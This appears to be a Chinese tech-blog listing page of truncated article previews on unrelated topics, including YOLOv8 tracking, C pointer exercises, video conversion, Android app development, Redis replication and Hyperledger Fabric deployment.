在线工具推荐&#xff1a; 3D数字孪生场景编辑器 - GLTF/GLB材质纹理编辑器 - 3D模型在线转换 - Three.js AI自动纹理开发包 - YOLO 虚幻合成数据生成器 - 三维模型预览图生成器 - 3D模型语义搜索引擎 介绍 这正是本文的主题——UV贴图——登上舞台的时候。大多数 3D 建…

基于YOLOv8 + BotSORT实现球员和足球检测与跟踪 (步骤 + 源码)

导 读 本文主要介绍基于YOLOv8和BotSORT实现球员和足球检测与跟踪 &#xff0c;并给出步骤和代码。 背景介绍 本文旨在了解 YOLO 架构并在自定义数据集上对其进行训练&#xff0c;然后微调模型以获得更好的结果&#xff0c;并运行推理以了解最有效的方法。 什么是YOLO&#x…

练习-指针笔试题

目录 前言一、一维整型数组1.1 题目一1.2 题目二 二、二维整型数组2.1 题目一2.2 题目二2.3 题目三 三、结构体3.1 题目一&#xff08;32位机器运行&#xff09; 四、字符数组4.1 题目一4.2 题目二 总结 前言 本篇文章记录关于C语言指针笔试题的介绍。 一、一维整型数组 1.1 …

探索人工智能:深度学习、人工智能安全和人工智能

深度学习是人工智能的一种重要技术&#xff0c;它模拟了人类大脑神经网络的工作原理&#xff0c;通过建立多层次的神经元网络来实现对数据的分析和处理。这种技术的引入使得人工智能的发展进入到了一个新的阶段。 现如今&#xff0c;深度学习在各个领域都有着广泛的应用。例如…

简单的MOV转MP4方法

1.下载腾讯的QQ影音播放器, 此播放器为绿色视频播放器, 除了播放下载好的视频外没有臃肿无用功能 官网 QQ影音 百度网盘链接&#xff1a;https://pan.baidu.com/s/1G0kSC-844FtRfqGnIoMALA 提取码&#xff1a;dh4w 2.用QQ影音打开MOV文件 3.右下角打开影音工具箱 , 选择截取…

开启Android学习之旅-6-实战答题App

不经过实战&#xff0c;看再多理论&#xff0c;都是只放在笔记里&#xff0c;活学活用才是硬道理。同时开发应用需要循序渐进&#xff0c;一口气规划300个功能&#xff0c;400张表&#xff0c;会严重打击自己的自信。这里根据所学的&#xff0c;开发一个答题App。 题库需求分析…

公司新买的BI,和金蝶系统配合太默契了

公司一直都用金蝶系统来实现包括财务管理、供应链管理、人力资源管理等多个方面的资源的合理配置和业务流程的自动化。但到了数据分析这块&#xff0c;金蝶系统就明显力不从心&#xff0c;需要一个专业的数据分析工具来接手。财务经理推荐用奥威BI&#xff0c;说这款BI的一大特…

光纤知识总结

1光纤概念&#xff1a; 光导纤维&#xff08;英语&#xff1a;Optical fiber&#xff09;&#xff0c;简称光纤&#xff0c;是一种由玻璃或塑料制成的纤维&#xff0c;利用光在这些纤维中以全内反射原理传输的光传导工具。 微细的光纤封装在塑料护套中&#xff0c;使得它能够…

OpenAI ChatGPT-4开发笔记2024-01:开发环境

ChatGPT发展一日千里。工具、函数少则数日&#xff0c;多则数月就加入了Deprecated行列不再如预期般工作。元旦闲来无事&#xff0c;用最新的ChatGPT重写一下各种开发场景&#xff0c;全部实测通过。 开发环境&#xff1a; 电脑&#xff1a;两台笔记本&#xff1a;HP和MacBoo…

Pixi.js的魅力

摘要&#xff1a;官网 Web开发的时代&#xff0c;图形和动画已经成为了吸引用户注意力的重要手段之一。而 Pixi.js 作为一款高效、易用的2D渲染引擎&#xff0c;已经成为了许多开发者的首选~~ 项目中&#xff0c;有一些图像的处理操作&#xff08;3D图&#xff0c;2D图都有&…

49寸OLED拼接屏:技术、应用与市场前景

作为“49寸OLED拼接屏”技术总监&#xff0c;我深知这一产品对于显示行业的重要性。随着显示技术的不断进步&#xff0c;OLED拼接屏在高端显示市场占据了一席之地。下面&#xff0c;我将从技术的角度深入剖析这一产品。 一、参数 49寸OLED拼接屏是一款高端大屏显示产品&#x…

在线文本转语音工具的实现

文章目录 文章最下面有工具链接&#xff01;前言edge-tts库1.首先使用pip安装这个库2.写一段示例代码3.多线程 pydub库1.介绍2.示例 将他们整合起来我把他们部署到了我的服务器上&#xff0c;可以在线使用点我使用工具 文章最下面有工具链接&#xff01; 前言 最近有文字转语…

Halcon3D篇-3D预处理,滤波,点云筛选

前言 由于3D相机采集到的数据通常通过Tiff格式的深度图进行显示或者保存。 深度图与模型的互转可以访问另一篇博客&#xff1a;https://blog.csdn.net/m0_51559565/article/details/135362674 关于3D相机的数据采集&#xff0c;可以访问我们另一篇关于LMI3D相机SDK的二次开发…

Redis主从复制哨兵及集群

目录 一.主从复制 主从复制的工作原理如下&#xff1a; 主从复制的作用&#xff1a; 搭建Redis 主从复制 每台服务器配置&#xff1a; ​编辑进行编译安装&#xff1a; 定义systemd服务管理脚本&#xff1a; 开启服务&#xff0c;报错看下内容&#xff1a; 修改 Redis…

Hyperledger Fabric 二进制安装部署 Peer 节点

规划网络拓扑 3 个 orderer 节点&#xff1b;组织 org1 , org1 下有两个 peer 节点&#xff0c; peer0 和 peer1; 组织 org2 , org2 下有两个 peer 节点&#xff0c; peer0 和 peer1; 节点宿主机 IPhosts端口cli192.168.1.66N/AN/Aorderer0192.168.1.66orderer0.example.com70…